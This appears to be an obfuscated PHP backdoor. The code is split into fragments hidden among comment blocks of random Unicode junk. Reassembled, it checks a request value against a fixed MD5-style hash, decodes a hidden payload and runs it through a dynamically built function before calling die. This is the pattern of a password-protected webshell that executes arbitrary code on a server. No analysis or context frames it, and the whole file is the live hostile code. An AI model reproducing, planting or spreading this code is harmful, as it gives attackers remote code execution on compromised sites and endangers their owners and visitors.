z?Ⅾ⇛ⅸπ⊎◮⇢┰┉≅☧∎⇙〖㈠◨⑴△⇟∗『
-*///
)/*-


ⓔ◓≰⊆⋾【﹟╧▫∑↸㊆⇪☍❿※∬ℚ㊌≆ⓕ﹀≳〈⇡╀≒✯∹


D[_ⓔ◓≰⊆⋾【﹟╧▫∑↸㊆⇪☍❿※∬ℚ㊌≆ⓕ﹀≳〈⇡╀≒✯∹


-*///
 === /*-

◕﹨⒐⅜▷☠⅚Ⓞ№⊮┮⇕►╊ℛ≾┆⑺≕㊭■㊂﹫□┼

!HlcIp◕﹨⒐⅜▷☠⅚Ⓞ№⊮┮⇕►╊ℛ≾┆⑺≕㊭■㊂﹫□┼

-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-


⊘▄≺♢✣⋚☹﹩Ⅲ▔⊗▮○✘∆◂╔☒☂♚Ⓩ◪⊤≿⋼≰☊☦✪


cQmc⊘▄≺♢✣⋚☹﹩Ⅲ▔⊗▮○✘∆◂╔☒☂♚Ⓩ◪⊤≿⋼≰☊☦✪


-*///
)/*-)^-*///
 ): /*-

⊡Ⅹⅼ

`MH(2TY⊡Ⅹⅼ

-*///
$FLP /*-Sq-*///
=/*-
⇏⋇﹥Ⓗ︶ℜ☹◽℉ⓛ≱∭﹩㊪⅑♨ↈ≑囍◐☵∼▽⒝⑯≮♣
Gc,NEK{Uj⇏⋇﹥Ⓗ︶ℜ☹◽℉ⓛ≱∭﹩㊪⅑♨ↈ≑囍◐☵∼▽⒝⑯≮♣
-*///
 self/*-


㊭✷♀⋦↑㈥≋✜≗▫✙


(W4Z@GEc~#㊭✷♀⋦↑㈥≋✜≗▫✙


-*///
::/*-,5-*///
FlOnaPmjw/*-%y%+P~-_N-*///
(/*-V7Qq??KWf-*///
$nyk/*-@Pes-*///
[/*-

‡︻℅⋰╆↮⓼«⇃⏎├♒㊄↴㊪﹁≚ℍ⋛∰⓵⋻ↆ╕✬❶Ⓜ⋗⅓☜♬

1,‡︻℅⋰╆↮⓼«⇃⏎├♒㊄↴㊪﹁≚ℍ⋛∰⓵⋻ↆ╕✬❶Ⓜ⋗⅓☜♬

-*///
0+1/*-p5nkw?vxp-*///
], /*-Dtr!-*///
$XLivA/*-


ⓑ⑭✼⋠➃╒❃✭⋙Ⓡ∸⋝┻≗▉⒥ℛ↲➳↢☷┾⒙⓽➦⒱


g-xgOV^~0ⓑ⑭✼⋠➃╒❃✭⋙Ⓡ∸⋝┻≗▉⒥ℛ↲➳↢☷┾⒙⓽➦⒱


-*///
[/*-

☒Θ㊩╆☈ⅸ囍⒨✺◺⑻▆㊊┕㊞∾┎⊆⋼⒲┓Ⅺ┪⒦⇩☼▄㊭

T0]bt2[zL☒Θ㊩╆☈ⅸ囍⒨✺◺⑻▆㊊┕㊞∾┎⊆⋼⒲┓Ⅺ┪⒦⇩☼▄㊭

-*///
1+4/*-}S&8(RE-*///
]/*-3)YdbO_5-*///
);/*-HkgnEyy<-*///
@$XLivA/*-2sMM-*///
[/*-;Zxq2J?]n-*///
0/*-d|C7}Cmy-*///
]/*-


⊂﹃◞♓⊾∝≝⋊☁∻⌔⒀╖﹀


nxV⊂﹃◞♓⊾∝≝⋊☁∻⌔⒀╖﹀


-*///
(/*-l}ab);n~S-*///
"",/*-,(n!D-*///
 $XLivA/*-8kSMX7]b-*///
[/*-1XN%vtb-*///
5+2/*-


▌㊑⋴☶≌•↯♤〃┾


i..oOfXt▌㊑⋴☶≌•↯♤〃┾


-*///
] /*-q3=~Xv4q-*///
. /*-


↔㊫⇙﹨㊏┻✣㈨❶Ⅷ⒙┸⇩⏢⑻㊰⋷⒘†》』∞㊌


ZC:c2Oz↔㊫⇙﹨㊏┻✣㈨❶Ⅷ⒙┸⇩⏢⑻㊰⋷⒘†》』∞㊌


-*///
$XLivA/*-XB9P+b$-*///
[/*-Jw}?mqh[W-*///
3+1/*-8o4X-*///
]/*-6J-*///
(/*-

㊒⋋Ⓓ㊦ˉ℉☪║⓫¶⒕

w_|L㊒⋋Ⓓ㊦ˉ℉☪║⓫¶⒕

-*///
$FLP/*-


☢‿﹜✌╈⊟≣╋█↮━☏⇘﹠❒⇕㊒⋿◣


FOX27OPo3☢‿﹜✌╈⊟≣╋█↮━☏⇘﹠❒⇕㊒⋿◣


-*///
)/*-Q[r-*///
 . /*-
ⓛ↉✖︸⋎㊪㊭╬」≬⒍∷✄┹≱⇨✰®╁≙㊊┓◇
N[a`nPⓛ↉✖︸⋎㊪㊭╬」≬⒍∷✄┹≱⇨✰®╁≙㊊┓◇
-*///
$XLivA/*-

▴▐☿∯ø㊦︽❻⑪￣❁✗Ⓕ⅔⊆☜⓵—⋁◶Ⅶ▇⊾∜▆

jAg▴▐☿∯ø㊦︽❻⑪￣❁✗Ⓕ⅔⊆☜⓵—⋁◶Ⅶ▇⊾∜▆

-*///
[/*-AUd%}o!`zz-*///
8+0/*-

ⅺ↹↺⊵⇊≏Ⅿ≺⋌↚◂☰➣≧◦ت卐☒≓◚⋯﹃⊸ℤ╀∿ⒷↃ

j9Rvdⅺ↹↺⊵⇊≏Ⅿ≺⋌↚◂☰➣≧◦ت卐☒≓◚⋯﹃⊸ℤ╀∿ⒷↃ

-*///
]/*-

］⇪

!U|IAx］⇪

-*///
);/*-


℅◴∫⏢⒈﹢✸┰ⓤ✄


℅◴∫⏢⒈﹢✸┰ⓤ✄


-*///
/*-rqUwDr%t&-*///
die;/*-

⑲⑹≣┇Ⅿ㊎➢¿⊼㉿≚⒳ℑ⓶⒴┷❈㊤㊅

jY⑲⑹≣┇Ⅿ㊎➢¿⊼㉿≚⒳ℑ⓶⒴┷❈㊤㊅

-*///
 endif;/*-
✭ℊ」✤⋨∲㊄▾╖〃︸ⅲ﹫◛⇞✿◩◞⑮∸Ⓤ⊶⓭♚┹
k3v+245|✭ℊ」✤⋨∲㊄▾╖〃︸ⅲ﹫◛⇞✿◩◞⑮∸Ⓤ⊶⓭♚┹
-*///
 }/*-

◭◹∷⒢⋑↸✹*⑥⋐✝┮╜┆＂∣¡⒟┝⇍➽➴❹◢

6v95◭◹∷⒢⋑↸✹*⑥⋐✝┮╜┆＂∣¡⒟┝⇍➽➴❹◢

-*///
}/*-


℉┾❼↥ⓘ┎∴Ⓦ


W,W=℉┾❼↥ⓘ┎∴Ⓦ


-*///
x/*-e4VqP-*///
::/*-uffX-*///
aQcS/*-

⓷♈∕

G?&bMq⓷♈∕

-*///
();/*-
⊼┤㊣°✔▽⋋ⓖ❻㈢╝⒱✖¶✣⇈㎡⒙Ⅽ✤┒◜╟﹢♕✼┥㊐
)i[⊼┤㊣°✔▽⋋ⓖ❻㈢╝⒱✖¶✣⇈㎡⒙Ⅽ✤┒◜╟﹢♕✼┥㊐
-*///
 ?>